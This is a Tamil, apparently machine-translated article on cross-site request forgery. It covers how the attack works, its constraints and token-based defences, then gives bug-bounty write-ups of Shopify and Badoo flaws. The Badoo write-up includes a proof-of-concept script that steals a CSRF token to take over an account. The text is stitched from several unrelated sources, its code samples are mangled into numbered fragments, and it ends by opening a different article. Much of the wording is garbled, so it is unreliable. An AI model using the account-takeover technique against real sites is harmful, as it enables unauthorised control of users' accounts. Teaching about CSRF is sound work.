கிராஸ்-சைட் கோரிக்கை மோசடி என்பது இணைய உலாவிக்கு எதிரான குழப்பமான ப்ராக்ஸி தாக்குதலாகும்.

CSRF பொதுவாக பின்வரும் பண்புகளைக் கொண்டுள்ளது:

• பயனர் அடையாளத்தை நம்பியிருக்கும் தளங்கள் இதில் அடங்கும்.
• இது இந்த அடையாளத்தின் மீதான தளத்தின் நம்பிக்கையை மேம்படுத்துகிறது.
• இலக்கு தளத்திற்கு HTTP கோரிக்கைகளை அனுப்புவதற்கு இது பயனரின் உலாவியை ஏமாற்றுகிறது.
• இதில் அடங்கும் HTTP கோரிக்கைகள்பக்க விளைவுகள் கொண்டவை.

HTTP வினைச்சொற்கள் மற்றும் CSRF

• HTTP GET இல், மேலே விவரிக்கப்பட்ட முறைகளைப் பயன்படுத்தி, கையாளப்பட்ட அளவுருக்கள் மற்றும் IMG குறிச்சொல்லைப் பயன்படுத்தி தானாக ஏற்றப்படும் ஒரு எளிய ஹைப்பர்லிங்க் போன்றவற்றைப் பயன்படுத்தி, CSRF சுரண்டல் அற்பமானது. HTTP விவரக்குறிப்பின்படி, GET ஒரு பாதுகாப்பான முறையாகப் பயன்படுத்தப்பட வேண்டும், அதாவது பயன்பாட்டில் பயனரின் நிலையை கணிசமாக மாற்றாமல். அத்தகைய செயல்பாடுகளுக்கு GET ஐப் பயன்படுத்தும் பயன்பாடுகள் HTTP POSTக்கு மாற வேண்டும் அல்லது CSRF பாதுகாப்பைப் பயன்படுத்த வேண்டும்.
• HTTP POST ஆனது விரிவான பயன்பாட்டு நிகழ்வுகளைப் பொறுத்து பல்வேறு CSRF பாதிப்புகளைக் கொண்டுள்ளது:
  • அதன் எளிமையான வடிவத்தில், வினவல் சரமாக குறியிடப்பட்ட தரவைக் கொண்ட ஒரு POST (புலம்1=மதிப்பு1&ஃபீல்டு2=மதிப்பு2) CSRF தாக்குதல் எளிமையான HTML படிவத்தைப் பயன்படுத்தி எளிதாக செயல்படுத்தப்படுகிறது மற்றும் CSRF எதிர்ப்பு நடவடிக்கைகள் பயன்படுத்தப்பட வேண்டும்.
  • தரவு வேறு ஏதேனும் வடிவத்தில் (JSON, XML) அனுப்பப்பட்டால், SOP மற்றும் ; ENCTYPE பண்புக்கூறைப் பயன்படுத்தி ஒரு எளிய HTML படிவத்திலிருந்து தன்னிச்சையான உள்ளடக்கத்தைச் சமர்ப்பிக்கும் முறை உள்ளது; அத்தகைய போலி கோரிக்கையை முறையானவற்றிலிருந்து உரை/எளிய உள்ளடக்க வகை மூலம் வேறுபடுத்தி அறியலாம், ஆனால் இது சர்வரில் செயல்படுத்தப்படாவிட்டால், CSRF செயல்படுத்தப்படும்.
• மற்ற HTTP முறைகள் (PUT, DELETE, முதலியன) SOP மற்றும் CSRF தடுப்புடன் XMLHttpRequest ஐப் பயன்படுத்தி மட்டுமே வழங்க முடியும்; இருப்பினும், அணுகல்-கட்டுப்பாடு-அனுமதி-ஆரிஜின்: * தலைப்பு மூலம் அவற்றை வெளிப்படையாக முடக்கும் இணையதளங்களில் இந்த நடவடிக்கைகள் செயல்படாது

CSRFக்கான பிற அணுகுமுறைகள்

கூடுதலாக, ஒரு நிலையான வகை தாக்குதல் என்று பொதுவாக விவரிக்கப்படும் போது, ​​சாமி புழுவால் நிரூபிக்கப்பட்டபடி, கிராஸ்-சைட் தாக்குதல் காட்சிகளுக்கான பேலோடின் ஒரு பகுதியாக CSRF மாறும் வகையில் கட்டமைக்கப்படலாம் அல்லது ஆஃப்சைட் உள்ளடக்கம் மூலம் கசிந்த அமர்வு தகவலிலிருந்து பறக்கும்போது கட்டமைக்கப்படலாம். தீங்கிழைக்கும் URL ஆக இலக்குக்கு அனுப்பப்பட்டது. CSRF டோக்கன்கள் அமர்வு நிர்ணயம் அல்லது பிற பாதிப்புகள் காரணமாக தீங்கிழைக்கும் கிளையண்டால் அனுப்பப்படலாம் அல்லது ஆயிரக்கணக்கான தோல்வியுற்ற கோரிக்கைகளை உருவாக்கும் தீங்கிழைக்கும் பக்கமாக மொழிபெயர்க்கப்பட்ட மிருகத்தனமான தாக்குதல் மூலம் யூகிக்கப்படலாம். "டைனமிக் சிஎஸ்ஆர்எஃப்" தாக்குதல் வகுப்பு, அல்லது ஒவ்வொரு கிளையண்ட் பேலோடைப் பயன்படுத்தி அமர்வு-குறிப்பிட்ட ஸ்பூஃபிங்கிற்கு, 2009 இல் நேதன் ஹமீல் மற்றும் சீன் மோயர் ஆகியோர் பிளாக்ஹாட் விளக்கக்காட்சிகளில் விவரித்தனர், இருப்பினும் வகைபிரித்தல் இன்னும் பரந்த பயன்பாட்டைப் பெறவில்லை.

ஜனவரி 2012 உள்ளூர் OWASP அத்தியாயக் கூட்டத்தில் - "AJAX Hammer - Dynamic CSRF" இல், டைனமிக் CSRF தாக்குதல்களை உருவாக்குவதற்கான ஒரு புதிய வெக்டரை Oren Ofer வழங்கினார்.

விளைவுகள்

ரூட் சிறப்புரிமைகளுடன் ரிமோட் கோட் செயல்பாட்டிற்கு வழிவகுக்கும் CSRF பாதிப்புகளுக்கு தீவிர குறிகாட்டிகள் வழங்கப்பட்டுள்ளன, மேலும் ரூட் சான்றிதழை சமரசம் செய்யக்கூடிய பாதிப்பு, இது பொது விசை உள்கட்டமைப்பை முற்றிலும் குறைமதிப்பிற்கு உட்படுத்தும்.

கட்டுப்பாடுகள்

குறுக்கு-தள போலி கோரிக்கை வெற்றிபெற பல விஷயங்கள் நடக்க வேண்டும்:

தாக்குபவர் பரிந்துரைத்தவரின் தலைப்பைச் சரிபார்க்காத தளத்தையோ அல்லது உலாவியைப் பயன்படுத்தி பாதிக்கப்பட்டவரையோ அல்லது பரிந்துரையாளர் ஏமாற்றுதலை அனுமதிக்கும் செருகுநிரலையோ குறிவைக்க வேண்டும்.

தாக்குபவர் இலக்கு தளம் அல்லது URL இல் சமர்ப்பிப்பு படிவத்தைக் கண்டறிய வேண்டும், அது ஏதாவது செய்வதால் ஏற்படும் பக்கவிளைவுகள் (பணத்தை மாற்றுவது அல்லது பாதிக்கப்பட்டவரின் மின்னஞ்சல் முகவரி அல்லது கடவுச்சொல்லை மாற்றுவது போன்றவை).

தாக்குபவர் அனைத்து படிவங்கள் அல்லது URL உள்ளீடுகளுக்கான சரியான மதிப்புகளைத் தீர்மானிக்க வேண்டும்; அவற்றில் ஏதேனும் இரகசிய அங்கீகார மதிப்புகள் அல்லது அடையாளங்காட்டிகள் இருந்தால், தாக்குபவர் யூகிக்க முடியாது, தாக்குதல் தோல்வியடையும் (தாக்குபவர் அவர்களின் யூகத்தில் மிகவும் அதிர்ஷ்டசாலியாக இல்லாவிட்டால்).

பாதிக்கப்பட்டவர் இலக்கு தளத்தில் உள்நுழையும்போது, ​​தீங்கிழைக்கும் குறியீட்டைக் கொண்ட வலைப்பக்கத்திற்கு தாக்குபவர் பாதிக்கப்பட்டவரை ஈர்க்க வேண்டும்.

தாக்குதல் கண்மூடித்தனமானது: கிராஸ்-சைட் ஸ்கிரிப்டிங் அல்லது இலக்கு தளத்தில் உள்ள மற்றொரு பிழையைப் பயன்படுத்திக் கொள்ளாவிட்டால், போலியான கோரிக்கைகளுக்குப் பதிலளிக்கும் வகையில் இலக்குத் தளம் பாதிக்கப்பட்டவருக்குத் திருப்பி அனுப்புவதைத் தாக்குபவர் பார்க்க முடியாது. கூடுதலாக, தாக்குதல் நடத்துபவர் எந்தவொரு இணைப்பையும் குறிவைக்கலாம் அல்லது ஆரம்ப போலியான கோரிக்கைக்குப் பிறகு வரும் படிவங்களைச் சமர்ப்பிக்கலாம். (பக்கத்தில் பல படங்களைச் சேர்ப்பதன் மூலம் பல இலக்குகளை உருவகப்படுத்தலாம் அல்லது கிளிக்குகளுக்கு இடையில் தாமதத்தை அறிமுகப்படுத்த ஜாவாஸ்கிரிப்டைப் பயன்படுத்தலாம்.)

இந்த கட்டுப்பாடுகள் கொடுக்கப்பட்டால், தாக்குபவர் பாதிக்கப்பட்டவர்களின் அநாமதேய அடையாளங்களை அல்லது பாதிக்கப்படக்கூடிய பிரதிநிதித்துவத்தைக் கண்டறிவதில் சிரமம் இருக்கலாம். மறுபுறம், தாக்குதல் முயற்சிகள் எளிதில் ஏற்றப்பட்டு பாதிக்கப்பட்டவர்களால் கண்டறியப்படாது, மேலும் பயன்பாட்டு டெவலப்பர்கள் கடவுச்சொல் கிராக்கிங் அகராதி தாக்குதல்களை விட சிஎஸ் தாக்குதல்களுக்குத் தயாராக இல்லை.

தடுப்பு

பெரும்பாலான CSRF தடுப்பு முறைகள் கூடுதல் அங்கீகாரத் தரவை கோரிக்கைகளில் உட்பொதிப்பதன் மூலம் செயல்படுகின்றன, இது இணையப் பயன்பாட்டை அங்கீகரிக்கப்படாத இடங்களிலிருந்து கோரிக்கைகளைக் கண்டறிய அனுமதிக்கிறது.

சின்க்ரோனைசர் மார்க்கர் மாதிரி

• உள்நுழைந்ததும், பயனரின் அமர்வு முழுவதும் மாறாமல் இருக்கும் சீரற்ற டோக்கனைக் கொண்ட குக்கீயை வலைப் பயன்பாடு அமைக்கிறது.

செட்-குக்கீ: Csrf-token=i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; காலாவதியாகும்=வியாழன், 23-ஜூலை-2015 10:25:33 GMT; அதிகபட்ச வயது=31449600; பாதை =/

• கிளையன்ட் பக்கத்தில் இயங்கும் ஜாவாஸ்கிரிப்ட் மதிப்பைப் படித்து ஒவ்வொரு பரிவர்த்தனை கோரிக்கையுடன் அனுப்பப்படும் தனிப்பயன் HTTP தலைப்புக்கு நகலெடுக்கிறது

X-Csrf-டோக்கன்: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql

• சேவையகம் டோக்கன்களின் இருப்பு மற்றும் ஒருமைப்பாட்டை சரிபார்க்கிறது

இந்த முறையின் பாதுகாப்பு, ஒரே தோற்றத்தில் இயங்கும் ஜாவாஸ்கிரிப்ட் மட்டுமே குக்கீயின் மதிப்பைப் படிக்க முடியும் என்ற அனுமானத்தின் அடிப்படையில் அமைந்துள்ளது. முரட்டு கோப்பு அல்லது மின்னஞ்சல் முகவரியுடன் இயங்கும் JavaScript ஆனது தனிப்பயன் தலைப்பைப் படிக்கவும் நகலெடுக்கவும் முடியாது. CSRF டோக்கன் குக்கீ தானாகவே முரட்டுக் கோரிக்கையுடன் அனுப்பப்பட்டாலும், சரியான X-CSRF டோக்கன் தலைப்பை சர்வர் எதிர்பார்க்கும்.

CSRF டோக்கன் தனிப்பட்டதாகவும் கணிக்க முடியாததாகவும் இருக்க வேண்டும். இது தோராயமாக உருவாக்கப்படலாம் அல்லது HMAC ஐப் பயன்படுத்தி அமர்வு டோக்கன்களிலிருந்து பெறலாம்:

Csrf_token = HMAC(session_token, application_secret)

CS குக்கீ டோக்கனில் HTTPO மட்டும் கொடி இருக்கக்கூடாது, ஏனெனில் இது JavaScript வடிவமைப்பால் படிக்கப்பட வேண்டும்.

இந்த முறை Django மற்றும் AngularJS போன்ற பல நவீன கட்டமைப்புகளால் செயல்படுத்தப்படுகிறது. பயனரின் அமர்வு முழுவதும் டோக்கன் நிலைத்திருப்பதால், இது AJAX பயன்பாடுகளுடன் நன்றாக வேலை செய்கிறது, ஆனால் வலை பயன்பாடுகளில் நிகழ்வு வரிசைமுறையை வழங்காது.

இலக்கு இணையதளம் பின்வரும் முறைகளில் ஒன்றைப் பயன்படுத்தி அதன் ஒரே மூலக் கொள்கையை முடக்கினால், இந்த முறையால் வழங்கப்படும் பாதுகாப்பைத் தடுக்கலாம்:

• அனுமதிக்கப்பட்ட அணுகல்-கட்டுப்பாடு-அனுமதி-மூலம் தலைப்பு (வாத நட்சத்திரத்துடன்)
• சில்வர்லைட் கட்டுப்பாடுகளுக்கு திட்டமிடப்படாத அணுகலை வழங்கும் clientaccesspolicy.xml கோப்பு
• crossdomain.xml கோப்பு ஃப்ளாஷ் திரைப்படங்களுக்கு திட்டமிடப்படாத அணுகலை வழங்குகிறது

குக்கீயை இருமுறை அனுப்பு

குக்கீ-டு-ஹெடர் அணுகுமுறையைப் போன்றது, ஆனால் ஜாவாஸ்கிரிப்ட் இல்லாமல், தளமானது ஒரு CSRF டோக்கனை குக்கீயாக அமைக்கலாம், மேலும் அதை ஒவ்வொன்றிலும் ஒரு மறைக்கப்பட்ட புலத்தில் செருகலாம் HTML படிவம், வாடிக்கையாளர் அனுப்பினார். படிவம் சமர்ப்பிக்கப்படும் போது, ​​குக்கீ மார்க்கர் குறிப்பான்களின் வடிவத்துடன் பொருந்துகிறதா என்பதை தளம் சரிபார்க்கலாம். பொதுவான மூலக் கொள்கையானது, தாக்குபவர்களை இலக்கு டொமைனில் குக்கீகளைப் படிக்கவோ அமைப்பதையோ தடுக்கிறது, எனவே அவர்களால் வடிவமைக்கப்பட்ட வடிவத்தில் சரியான டோக்கனை வைக்க முடியாது.

சின்க்ரோனைசர் வடிவத்தை விட இந்த முறையின் நன்மை என்னவென்றால், டோக்கனை சர்வரில் சேமிக்க வேண்டியதில்லை.

வாடிக்கையாளர் உத்தரவாதம்

RequestPolicy (Mozilla Firefox க்கான) அல்லது Umatrix (Firefox மற்றும் Google Chrome/Chromium ஆகிய இரண்டிற்கும்) போன்ற உலாவி நீட்டிப்புகள், குறுக்கு-தள கோரிக்கைகளுக்கு இயல்புநிலை மறுப்புக் கொள்கையை வழங்குவதன் மூலம் CSRF ஐத் தடுக்கலாம். இருப்பினும், இது பல தளங்களின் இயல்பான செயல்பாட்டில் குறிப்பிடத்தக்க அளவில் தலையிடலாம். CsFire நீட்டிப்பு (Firefox க்காகவும்) CSRF இன் தாக்கத்தை குறைத்து, சாதாரண உலாவல் மீது கிராஸ்-சைட் கோரிக்கைகளில் இருந்து அங்கீகாரத் தகவலை அகற்றுவதன் மூலம் குறைக்க முடியும்.

Cross Site Request Forgery, அல்லது CSRF, ஒரு தீங்கிழைக்கும் தளம், மின்னஞ்சல், செய்தி, பயன்பாடு அல்லது வேறு ஏதேனும் ஒரு பயனரின் உலாவியானது அந்த பயனர் ஏற்கனவே அங்கீகரிக்கப்பட்ட மற்றொரு தளத்தில் சில செயல்களைச் செய்யும்போது ஏற்படும் தாக்குதல் ஆகும். பெரும்பாலும் இது பயனருக்குத் தெரியாமல் நடக்கும்.

CSRF தாக்குதலால் ஏற்படும் சேதம், நடவடிக்கை பெறும் தளத்தைப் பொறுத்தது. இங்கே ஒரு உதாரணம்:

ஆன்லைன் வங்கி கிளையண்டில் பாப் தனது தனிப்பட்ட கணக்கில் நுழைந்து, சில செயல்பாடுகளைச் செய்கிறார், ஆனால் வெளியேறவில்லை.

பாப் தனது மின்னஞ்சலைச் சரிபார்த்து, அவரை அறிமுகமில்லாத தளத்திற்கு அழைத்துச் செல்லும் இணைப்பைக் கிளிக் செய்கிறார்.

ஒரு அறிமுகமில்லாத தளம், பாபின் ஆன்லைன் வங்கி கிளையண்டிடம் பணத்தைப் பரிமாற்றம் செய்யும்படி கோரிக்கை விடுத்து, அவரது முந்தைய அமர்வில் சேமிக்கப்பட்ட தகவலை பாபின் குக்கீக்கு அனுப்புகிறது.

CSRF டோக்கனைப் பயன்படுத்தாமலேயே அறிமுகமில்லாத (தீங்கிழைக்கும்) தளத்தின் கோரிக்கையை Bob's Bank தளம் ஏற்றுக்கொண்டு மொழிபெயர்ப்பைச் செய்கிறது.

ஒரு தீங்கிழைக்கும் ஒரு இணைப்பு போது இன்னும் சுவாரஸ்யமான சூழ்நிலை
தளம் செல்லுபடியாகும் HTML இல் இருக்கலாம், இதற்கு நன்றி Bo-
நீங்கள் இணைப்பைக் கிளிக் செய்ய வேண்டியதில்லை: . பாபின் சாதனம் (உதாரணமாக, உலாவி) வழங்கினால்
இந்தப் படம் malicious_site.com க்கு கோரிக்கையை வைக்கும் மற்றும் CSRF தாக்குதலை ஏற்படுத்தும்.

CSRF தாக்குதல்களின் ஆபத்துகளை நீங்கள் இப்போது அறிந்திருக்கிறீர்கள், அவற்றிலிருந்து நீங்கள் பல வழிகளில் பாதுகாக்கலாம், இதில் மிகவும் பிரபலமானது ஒருவேளை CSRF டோக்கனின் பயன்பாடாகும், இது தரவை மாற்றக்கூடிய எந்தவொரு கோரிக்கையுடன் அனுப்பப்பட வேண்டும் ( POST கோரிக்கைகள் போன்றவை). ஒரு வலைப் பயன்பாடு (பாபின் ஆன்லைன் வங்கி போன்றவை) இரண்டு பகுதிகளைக் கொண்ட டோக்கனை உருவாக்க வேண்டும், அதில் ஒன்று பாப் பெறும் மற்றும் இரண்டாவது பயன்பாட்டில் சேமிக்கப்படும்.

பணப் பரிமாற்றக் கோரிக்கையை பாப் செய்ய முயலும்போது, ​​அவர் ஒரு டோக்கனை அனுப்ப வேண்டும், அது பயன்பாட்டில் சேமிக்கப்பட்டுள்ள டோக்கனைப் பயன்படுத்தி வங்கியின் செல்லுபடியாக்கத்திற்குச் சரிபார்க்கப்படும்.

CSRF மற்றும் CSRF டோக்கன்களைப் பற்றி இப்போது நாம் அறிந்திருப்பதால், கிராஸ் ஆரிஜின் ரிசோர்ஸ் ஷேரிங் (CORS) அதிக அர்த்தமுள்ளதாக இருக்கிறது, இருப்பினும் நான் புதிய இலக்குகளை ஆராய்ந்தபோது இதை நான் கவனித்திருக்கலாம். பொதுவாக, தரவை அணுகக்கூடிய ஆதாரங்களின் பட்டியலை CORS கட்டுப்படுத்துகிறது. வேறு வார்த்தைகளில் கூறுவதானால், ஒரு தளத்தைப் பாதுகாக்க CORS ஐப் பயன்படுத்தும்போது, ​​இலக்கு பயன்பாட்டை அழைக்க, பதிலைப் படிக்க, இலக்கு தளம் உங்களை அனுமதித்தால், நீங்கள் Javascript ஐ எழுதலாம்.

இது குழப்பமாகத் தோன்றினால், HackerOne.com/activity.jsonக்கு அழைப்பை மேற்கொள்ள Javascript ஐப் பயன்படுத்தி, பதிலைப் படித்து, இரண்டாவது அழைப்பை மேற்கொள்ளவும். கீழே உள்ள எடுத்துக்காட்டு #3 இல் இதன் முக்கியத்துவத்தையும் சாத்தியமான தீர்வுகளையும் நீங்கள் காண்பீர்கள்.

இறுதியாக, CSRF டோக்கன் இல்லாத ஒவ்வொரு கோரிக்கையும் செல்லுபடியாகாது என்பதை (இதைச் சுட்டிக்காட்டிய ஜோபர்ட் அப்மாவுக்கு நன்றி) கவனிக்க வேண்டியது அவசியம். சில தளங்கள் கூடுதல் சரிபார்ப்புகளைச் செய்யலாம், எடுத்துக்காட்டாக, தொடக்கத் தலைப்பை ஒப்பிட்டுப் பார்ப்பது (இது பாதுகாப்பானது என்று உத்தரவாதம் அளிக்கப்படவில்லை மற்றும் அறியப்பட்ட தவறுகள் இருந்தாலும்). கோரப்பட்ட ஆதாரத்துடன் இணைக்கும் பக்கத்தின் முகவரியைக் கண்டறியும் புலம் இது. வேறு வார்த்தைகளில் கூறுவதானால், தோற்றுவாய் கட்சி (பரிந்துரைப்பவர்)

HTTP கோரிக்கையைப் பெற்ற அதே தளத்தைத் தவிர வேறொரு தளத்திலிருந்து POST அழைப்பைச் செய்கிறது, CSRF டோக்கனைப் பயன்படுத்துவதைப் போன்ற விளைவை அடைய அந்தத் தளம் அழைப்பை அனுமதிக்காது. கூடுதலாக, ஒவ்வொரு தளமும் டோக்கனை உருவாக்கும்போது அல்லது வரையறுக்கும்போது csrf விதிமுறைகளைப் பயன்படுத்துவதில்லை. எடுத்துக்காட்டாக, Badoo இல் இது கீழே விவரிக்கப்பட்டுள்ள rt அளவுருவாகும்.

CSRF டுடோரியலுக்கான OWASP சோதனையைப் படிக்கவும்

எடுத்துக்காட்டுகள் 1. நிறுவப்பட்ட Shopify பயனர்களை ஏற்றுமதி செய்தல்

சிரமம்: குறைவு
Url: https://app.shopify.com/services/partners/api_clients/XXXX/export_installed_users

விளக்கம்:

மேலே காட்டப்பட்டுள்ள URL வழியாக நிறுவப்பட்ட பயனர்களின் பட்டியலை ஏற்றுமதி செய்வதற்கான இறுதிப் புள்ளியை Shopify API வழங்குகிறது. பாதிப்பு என்னவென்றால், தளம் இந்த இறுதிப்புள்ளிக்கு ஒரு கோரிக்கையை வைக்கலாம் மற்றும் பதிலுக்கு தகவலைப் பெறலாம்

இந்தக் கோரிக்கையைச் சரிபார்க்க, Shopify CSRF டோக்கனைப் பயன்படுத்தவில்லை. இதன் விளைவாக, சந்தேகத்திற்கு இடமின்றி பாதிக்கப்பட்டவரின் சார்பாக ஒரு படிவத்தைச் சமர்ப்பிக்க பின்வரும் HTML குறியீடு பயன்படுத்தப்படலாம்.

1 2 csrf 3 4 7 8 9

இந்த எடுத்துக்காட்டில், ஒரு எளிய வருகையுடன் ஜாவாஸ்கிரிப்ட் பக்கங்கள்பாதிக்கப்பட்டவரின் உலாவியில் அமைக்கப்பட்டுள்ள Shopify குக்கீகளைப் பயன்படுத்தி Shopify API க்கு GET கோரிக்கையை உள்ளடக்கிய படிவத்தைச் சமர்ப்பிக்கிறது.

முடிவுரை

உங்கள் தாக்குதல்களின் அளவை அதிகரித்து, தளத்தில் மட்டுமல்ல, API யிலும் பிழைகளைத் தேடுங்கள். API இறுதிப்புள்ளிகள் சுரண்டலுக்கான ஒரு சாத்தியமான வழியாகும், எனவே இதை மனதில் வைத்திருப்பது மதிப்புக்குரியது, குறிப்பாக வலை இடைமுகம் உருவாக்கப்பட்ட பிறகு API உருவாக்கப்பட்டிருக்கலாம் அல்லது கிடைக்கப்பெற்றிருக்கலாம் என்பது உங்களுக்குத் தெரிந்தால்.

2. Twitter இலிருந்து Shopify இணைப்பைத் துண்டிக்கவும்

சிரமம்: குறைவு
URL: https://twitter-commerce.shopifyapps.com/auth/twitter/disconnect

Shopify ட்விட்டர் ஒருங்கிணைப்பை வழங்குகிறது, இது கடை உரிமையாளர்கள் தங்கள் தயாரிப்புகளைப் பற்றி ட்வீட் செய்ய அனுமதிக்கிறது. இதேபோல், இணைக்கப்பட்ட கடையிலிருந்து ட்விட்டர் கணக்கைத் துண்டிக்க இந்த சேவை உங்களை அனுமதிக்கிறது.

கடையில் இருந்து உங்கள் Twitter கணக்கை முடக்குவதற்கான URL மேலே பட்டியலிடப்பட்டுள்ளது. கோரிக்கையைச் செய்யும் போது, ​​Shopify CSRF டோக்கனைச் சரிபார்க்கவில்லை, இது தாக்குபவர் ஒரு போலி இணைப்பை உருவாக்க அனுமதித்தது, அதைக் கிளிக் செய்யும் போது, ​​சந்தேகத்திற்கு இடமில்லாத கடை உரிமையாளர் Twitter இலிருந்து தனது கடையைத் துண்டிக்கும்.

பாதிப்பை விவரிப்பதில், WeSecureApp பாதிக்கப்படக்கூடிய கோரிக்கையின் பின்வரும் உதாரணத்தை வழங்கியது; img குறிச்சொல்லின் பயன்பாடு பாதிக்கப்படக்கூடிய URL க்கு அழைப்பை ஏற்படுத்துகிறது என்பதை நினைவில் கொள்க:

1 GET /auth/twitter/disconnect HTTP/1.1 2 புரவலன்: twitter-commerce.shopifyapps.com 3 பயனர் முகவர்: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.1 4 1; rv:43.0) Firefox/43.01 5 ஏற்கவும்: text/html, application/xhtml+xml, application/x 6 ml 7 Accept-Language: en-US,en;q=0.5 8 Accept-Encoding: gzip, deflate 9 Referer: https://twitter-commerce .shopifyapps.com/accou 10 nt 11 குக்கீ: _twitter-commerce_session=REDACTED 12 >இணைப்பு: Keep-alive

அனுப்பிய URL இலிருந்து படத்தைப் பெறுவதற்கு உலாவி GET கோரிக்கையை முன்வைப்பதாலும், CSRF டோக்கன் சரிபார்க்கப்படாததாலும், தனிப்பயன் அங்காடி இப்போது முடக்கப்பட்டுள்ளது:

1 2 3 5 6

முடிவுரை

இந்தச் சூழ்நிலையில், Shopify க்கு அனுப்பப்பட்ட கோரிக்கையைப் பார்த்து, GET கோரிக்கையைப் பயன்படுத்தி கோரிக்கை செய்யப்பட்டிருப்பதைப் பார்த்து, பர்ப் அல்லது பயர்பாக்ஸ் டேம்பர் டேட்டா போன்ற ப்ராக்ஸி சேவையகத்தைப் பயன்படுத்தி விவரிக்கப்பட்டுள்ள பாதிப்பைக் கண்டறியலாம். இது இடையூறாக இருந்ததாலும், GET கோரிக்கைகள் தரவைச் சேவையகத்திற்கு மாற்றக் கூடாது என்பதாலும், இது ஆய்வுக்குரியது.

3. Badoo மீது முழுமையான கணக்கு கையகப்படுத்தல்

சிரமம்: நடுத்தர
URL: https://badoo.com
அறிக்கை இணைப்பு: https://hackerone.com/reports/12770312
அறிக்கை தேதி: ஏப்ரல் 1, 2016
வெகுமதி செலுத்தப்பட்டது: $852

விளக்கம்:

நீங்கள் Badoo ஐப் பார்த்தால், URL இல் rt அளவுருவைச் சேர்ப்பதன் மூலம் அவை CSRF க்கு எதிராகப் பாதுகாக்கின்றன, இது 5 எழுத்துக்கள் மட்டுமே நீளமானது (குறைந்தது எழுதும் நேரத்தில்). HackerOne இல் Badoo ஒரு பிரச்சாரத்தைத் தொடங்கியபோது இதை நான் கவனித்திருந்தாலும், அதைப் பயன்படுத்துவதற்கான வழியை என்னால் கண்டுபிடிக்க முடியவில்லை. இருப்பினும், மஹ்மூத் ஜமால் (zombiehelp54) அதைக் கண்டுபிடித்தார்.

rt அளவுருவின் பொருளைப் புரிந்துகொண்ட பிறகு, கிட்டத்தட்ட எல்லா json பதில்களிலும் அளவுரு திரும்பியிருப்பதையும் அவர் கவனித்தார். துரதிர்ஷ்டவசமாக, இந்த பதில்களைப் படிப்பதன் மூலம் CORS தாக்குதலிலிருந்து Badoo ஐப் பாதுகாக்கிறது என்பதால் இது எந்தப் பயனையும் செய்யவில்லை. மஹ்மூத் தேடுதலை தொடர்ந்தார்.

https://eu1.badoo.com/worker-scope/chrome-ser என்ற கோப்பில் rt மதிப்பு உள்ளது. இன்னும் சிறப்பாக இருந்தது இந்த கோப்பு
தாக்குபவர் தன்னிச்சையாக படிக்க முடியும் மற்றும் தேவையில்லை
பாதிக்கப்பட்டவர் தீங்கிழைக்கும் வலைப்பக்கத்தைப் பார்வையிடுவதைத் தவிர வேறு எந்த நடவடிக்கையும் எடுப்பதில்லை. அவர் வழங்கிய குறியீடு இதோ:

1 2 3 Badoo கணக்கு 4 6 7 8 9 செயல்பாடு getCSRFcode(str) (10 return str.split('='); 11 ) 12 window.onload = function())( 13 var csrf_code = getCSRFcode(url_stats); 14 csrf_url = 'https://eu1.badoo.com/google/verify.phtml?c 15 ode=4/nprfspM3yfn2SFUBear08KQaXo609JkArgoju1gZ6Pc&authu 16 ser=3&session1st=3&session. ஒன்று&rt='+ csrf_code ; 18 window.location = csrf_url ; 19 ); 20

அடிப்படையில், பாதிக்கப்பட்டவர் பக்கத்தை ஏற்றும் போது, ​​அது Badoo ஸ்கிரிப்ட்டிற்கு கோரிக்கை வைக்கும், அந்த பயனருக்கான rt அளவுருவை எடுத்து, பின்னர் பாதிக்கப்பட்டவரின் சார்பாக கோரிக்கையை வைக்கும். இந்த நிலையில், பாதிக்கப்பட்டவரின் கணக்குடன் மஹ்மூத்தின் கணக்கை இணைத்ததன் மூலம் கணக்கை முழுமையாக கையகப்படுத்த முடிந்தது.

முடிவுரை

எங்கே புகை இருக்கிறதோ, அங்கே நெருப்பு இருக்கிறது இங்கே, குறிப்பிட்ட json பதில்களில் rt அளவுரு வெவ்வேறு இடங்களில் திரும்புவதை மஹ்மூத் கவனித்தார். எனவே js கோப்பில் இந்த வழக்கில் பயன்படுத்தக்கூடிய இடத்தில் எங்காவது காட்டப்படலாம் என்று அவர் சரியாகக் கருதினார்.

முடிவுகள்

CSRF தாக்குதல்கள் மற்றொரு ஆபத்தான தாக்குதல் வெக்டரைப் பிரதிநிதித்துவப்படுத்துகிறது மற்றும் பாதிக்கப்பட்டவரின் தரப்பில் சிறிய அல்லது செயலில் உள்ள நடவடிக்கை இல்லாமல் மேற்கொள்ளப்படலாம். CSRF பாதிப்புகளைக் கண்டறிவதற்கு சில புத்திசாலித்தனம் மற்றும் மீண்டும், எல்லாவற்றையும் சோதிக்க விருப்பம் தேவை.

ஒரு விதியாக, தளம் POST கோரிக்கையை முன்வைத்தால், ரெயில்ஸ் போன்ற கட்டமைப்பின் மூலம் படிவங்கள் இயல்பாகவே பாதுகாக்கப்படும், ஆனால் APIகள்

ஒரு தனி கதை இருக்கும். எடுத்துக்காட்டாக, Shopify முதன்மையாக ரூபி ஆன் ரெயில்ஸ் கட்டமைப்பில் எழுதப்பட்டுள்ளது, இது முன்னிருப்பாக அனைத்து வடிவங்களுக்கும் CSRF பாதுகாப்பை வழங்குகிறது (அதை முடக்கலாம் என்றாலும்). இருப்பினும், இந்த கட்டமைப்பைப் பயன்படுத்தி உருவாக்கப்பட்ட API களுக்கு இது அவசியம் இல்லை. இறுதியாக, சேவையகத்தில் உள்ள தரவை மாற்றும் அழைப்புகளுக்கு கவனம் செலுத்துங்கள் (நீக்கு நடவடிக்கை போன்றவை) மற்றும் GET கோரிக்கையைப் பயன்படுத்தி செய்யப்படும்.

இந்த பாதிப்பு என்ன என்பதை விவரிக்க முயற்சித்தேன், முக்கியமாக, CSRF தாக்குதலை மேற்கொள்ள என்ன நிபந்தனைகள் அவசியம்.

இந்த கட்டுரையில் வெளியில் இருந்து இந்த வகையான தாக்குதல்களுக்கு எதிரான பாதுகாப்பைப் பற்றி பேச முயற்சிப்பேன்:

• வாடிக்கையாளர் பக்கத்திலிருந்து - உங்களைப் பாதுகாத்துக் கொள்வதற்கான முக்கிய வழிகள்
• சர்வர் பக்கம் - சரியான பயன்பாட்டு வடிவமைப்பு

CSRF இலிருந்து உங்களை எவ்வாறு பாதுகாப்பது என்பதில் நீங்கள் ஆர்வமாக இருந்தால், பூனைக்கு வரவேற்கிறோம்.

பொதுவான செய்தி

